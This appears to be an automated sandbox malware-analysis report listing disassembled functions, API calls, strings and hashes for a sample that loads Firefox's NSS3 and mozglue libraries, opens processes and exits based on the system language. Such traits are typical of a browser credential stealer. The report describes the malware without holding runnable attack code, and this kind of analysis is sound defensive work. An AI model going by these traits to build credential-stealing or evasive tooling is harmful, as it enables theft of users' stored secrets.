Instruction Fuzzy Hash: E741D172A0011A9FEB008F69AC41BAF3BF4AF4435CF054036ED19AB652E730E915C7A1

Function 6CF57EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6CF580DD), ref: 6CF57F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CF580DD), ref: 6CF57F36
free.MOZGLUE(?,?,?,6CF580DD), ref: 6CF57F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CF580DD), ref: 6CF57F5D
DeleteCriticalSection.KERNEL32(?,6CF580DD), ref: 6CF57F94
free.MOZGLUE(?), ref: 6CF57F9B
PR_SetError.NSS3(FFFFE08B,00000000,6CF580DD), ref: 6CF57FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CF580DD), ref: 6CF57FE6
free.MOZGLUE(?,6CF580DD), ref: 6CF5802D

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: 45aece14b9118b11bba64dee3c4a87a65ef92f54464f37a2af0df6a760b51d4b
Instruction ID: 5c55e10cb351cff48ad23be581187ef981019736d8f81bbfde73d02d32164cd9
Opcode Fuzzy Hash: 45aece14b9118b11bba64dee3c4a87a65ef92f54464f37a2af0df6a760b51d4b
Instruction Fuzzy Hash: 96413CB1A015008BDF20DFBAC895B8E3BB5BB67318F58513AE6198BB42D731D415C7D0

Function 6CF9FEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF9FF00

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6CF9FF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CF9FF26
PORT_ArenaMark_Util.NSS3(?), ref: 6CF9FF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CF9FF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CF9FF8C

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: eb65b107d6ab4390eb51ae9b8597edc11a91ab01d9d76eaba5d275d8a7d07233
Instruction ID: 44ca5e180e498926cb9ca126fadfae4b0a79d89acc63e36a179eda5a545621c7
Opcode Fuzzy Hash: eb65b107d6ab4390eb51ae9b8597edc11a91ab01d9d76eaba5d275d8a7d07233
Instruction Fuzzy Hash: 463133B6901312DBFB108EA99C40B5BB6A8AF8230CF158239FD1A87700EB70D915C7D1

Function 6CFA4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CFA536F,00000022,?,?,00000000,?), ref: 6CFA4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CFA4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CFA4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CFA4FAE
free.MOZGLUE(?), ref: 6CFA4FC8

Strings

%s=%c%s%c, xrefs: 6CFA4FA9
%s=%s, xrefs: 6CFA4F89

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: 39f0110d2593e962ac0c343f583554c16acf94bbb8ea6ee9a299263571c0eb30
Instruction ID: 494c01836de7c8438117273eb3499fea2e72e9b0430eed8db08b0a01d1667468
Opcode Fuzzy Hash: 39f0110d2593e962ac0c343f583554c16acf94bbb8ea6ee9a299263571c0eb30
Instruction Fuzzy Hash: 09511731A05146CBEB01CBE984D07FFFFF59F46308F28A126E894A7A41DB35980787A1

Function 6CEE7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEE7E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CEE7E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6CEE7EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CEE7F2E

Strings

%s at line %d of [%.10s], xrefs: 6CEE7EE7, 6CEE7F28
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CEE7ED8, 6CEE7F08, 6CEE7F19
database corruption, xrefs: 6CEE7EE2, 6CEE7F23

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: d7e330d7f32924e7164d5d76ceb5d2a10488ce12b08b52b73a66d174f3e97680
Instruction ID: 0461a0f706dd65e22b955ee914364e49b13cc23e2e75249ca77b487052de6e4c
Opcode Fuzzy Hash: d7e330d7f32924e7164d5d76ceb5d2a10488ce12b08b52b73a66d174f3e97680
Instruction Fuzzy Hash: 7B61B374A042459FDB05CF24C890B6A3772BF89348F2945A8EC194F763D730EC56CBA1

Function 6CECFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CECFD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CECFD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CECFE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CECFE83

Part of subcall function 6CECFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CECFEFA
Part of subcall function 6CECFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CECFF3B

Strings

%s at line %d of [%.10s], xrefs: 6CECFD73, 6CECFE35
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CECFD64, 6CECFE26
database corruption, xrefs: 6CECFD6E, 6CECFE30

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: 70905a21f345be2573505bffcf3ffbbd3d3c9565b6a827eec5622c40497bb4fa
Instruction ID: e1aea09ecdac252be8e339bcdc749028aa830f9ab12044f1f4f50928dacc7652
Opcode Fuzzy Hash: 70905a21f345be2573505bffcf3ffbbd3d3c9565b6a827eec5622c40497bb4fa
Instruction Fuzzy Hash: BD51A271B002059FDB04CFA9C990BAEBBB1FF48318F244069E915AB752E735EC41CBA5

Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
memset.MSVCRT ref: 004173EA
??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 82990524a3921559f424eb0f070a97a07d0ec7f3c3e5fb413321498b33a75867
Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
Opcode Fuzzy Hash: 82990524a3921559f424eb0f070a97a07d0ec7f3c3e5fb413321498b33a75867
Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59

Function 6CF58CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CF6124D,00000001), ref: 6CF58D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CF6124D,00000001), ref: 6CF58D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CF6124D,00000001), ref: 6CF58D73
PR_Unlock.NSS3(?,?,?,?,?,6CF6124D,00000001), ref: 6CF58D8C

Part of subcall function 6CFEDD70: TlsGetValue.KERNEL32 ref: 6CFEDD8C
Part of subcall function 6CFEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4

PR_Unlock.NSS3(?,?,?,?,?,6CF6124D,00000001), ref: 6CF58DBA

Strings

KRAM, xrefs: 6CF58CF9
KRAM, xrefs: 6CF58D3E

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: a4cf0e4fbfa7861ed497c043c64c67a2bd80a248f400ca322d09f697246b310a
Instruction ID: 71840f441ef852fabfb8a2555f07382412c4288aceef9def8944135534af5c68
Opcode Fuzzy Hash: a4cf0e4fbfa7861ed497c043c64c67a2bd80a248f400ca322d09f697246b310a
Instruction Fuzzy Hash: 832191B5A546018FCB00EF38C58475ABBF0FF55308F55896ADE8887701D734D852CB91

Function 6CF7ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CF7ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF7AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF7AD23

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF7AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6CF7AD1C
hSession = 0x%x, xrefs: 6CF7ACFE, 6CF7AD0E
C_MessageDecryptFinal, xrefs: 6CF7ACE1

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: c09cd03330cda9ea0b7f15753dfecd5b97e4699df2c4261882bdd74ec537facd
Instruction ID: 6d60a41535c449997a038b6680f8965a8e9e783027fbe6f516dc9a731c860162
Opcode Fuzzy Hash: c09cd03330cda9ea0b7f15753dfecd5b97e4699df2c4261882bdd74ec537facd
Instruction Fuzzy Hash: BD21F571504514AFEB209B75EE94B6F33B5EB82309F0A5026E90D97253DB30D848C6A2

Function 6D014D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D014DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D014DE0

Strings

%s at line %d of [%.10s], xrefs: 6D014DDA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D014DCB
invalid, xrefs: 6D014DB8
misuse, xrefs: 6D014DD5
API call with %s database connection pointer, xrefs: 6D014DBD

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 49e789314c9e1cad52adca0a6950345b87a3495048992887ab10958b18c56a6f
Instruction ID: 006f328d96a498cf455ab03b5dcb5e8862f8fbbdd52b16c0da594c666d253ed4
Opcode Fuzzy Hash: 49e789314c9e1cad52adca0a6950345b87a3495048992887ab10958b18c56a6f
Instruction Fuzzy Hash: 5AF0B411E186657BFF505194CD11FE637955F0931DF5600A1ED1C6B2A3D205D8508299

Function 6D014DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D014E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D014E4D

Strings

%s at line %d of [%.10s], xrefs: 6D014E47
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D014E38
invalid, xrefs: 6D014E25
misuse, xrefs: 6D014E42
API call with %s database connection pointer, xrefs: 6D014E2A

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 9906339bcf7923d85618546d701b0540261737f6686ea1f7a5ae3535ffc25b1f
Instruction ID: 67c74f1c02413fc5991dfeecb50fac1b3f90ecc47af1303661e2700dc6872c38
Opcode Fuzzy Hash: 9906339bcf7923d85618546d701b0540261737f6686ea1f7a5ae3535ffc25b1f
Instruction Fuzzy Hash: F7F02751F4C9293BFB2011A4DC10FF63BCAAB09729F4500A1EA1C6B2E3D215D86142A9

Function 00416A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
ExitProcess.KERNEL32 ref: 00416A45
ExitProcess.KERNEL32 ref: 00416A4F
ExitProcess.KERNEL32 ref: 00416A59
ExitProcess.KERNEL32 ref: 00416A63
ExitProcess.KERNEL32 ref: 00416A6D

Strings

*, xrefs: 00416A2C

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52

Function 6CF80C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CF81444,?,00000001,?,00000000,00000000,?,?,6CF81444,?,?,00000000,?,?), ref: 6CF80CB3

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CF81444,?,00000001,?,00000000,00000000,?,?,6CF81444,?), ref: 6CF80DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CF81444,?,00000001,?,00000000,00000000,?,?,6CF81444,?), ref: 6CF80DEC

Part of subcall function 6CFA0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CF42AF5,?,?,?,?,?,6CF40A1B,00000000), ref: 6CFA0F1A
Part of subcall function 6CFA0F10: malloc.MOZGLUE(00000001), ref: 6CFA0F30
Part of subcall function 6CFA0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CFA0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CF81444,?,00000001,?,00000000,00000000,?), ref: 6CF80DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CF81444,?,00000001,?,00000000), ref: 6CF80E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CF81444,?,00000001,?,00000000,00000000,?), ref: 6CF80E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CF81444,?,00000001,?,00000000,00000000,?,?,6CF81444,?,?,00000000), ref: 6CF80E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CF81444,?,00000001,?,00000000,00000000,?), ref: 6CF80E79

Part of subcall function 6CF91560: TlsGetValue.KERNEL32(00000000,?,6CF60844,?), ref: 6CF9157A
Part of subcall function 6CF91560: EnterCriticalSection.KERNEL32(?,?,?,6CF60844,?), ref: 6CF9158F
Part of subcall function 6CF91560: PR_Unlock.NSS3(?,?,?,?,6CF60844,?), ref: 6CF915B2

Part of subcall function 6CF5B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CF61397,00000000,?,6CF5CF93,5B5F5EC0,00000000,?,6CF61397,?), ref: 6CF5B1CB
Part of subcall function 6CF5B1A0: free.MOZGLUE(5B5F5EC0,?,6CF5CF93,5B5F5EC0,00000000,?,6CF61397,?), ref: 6CF5B1D2

Part of subcall function 6CF589E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CF588AE,-00000008), ref: 6CF58A04
Part of subcall function 6CF589E0: EnterCriticalSection.KERNEL32(?), ref: 6CF58A15
Part of subcall function 6CF589E0: memset.VCRUNTIME140(6CF588AE,00000000,00000132), ref: 6CF58A27
Part of subcall function 6CF589E0: PR_Unlock.NSS3(?), ref: 6CF58A35

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
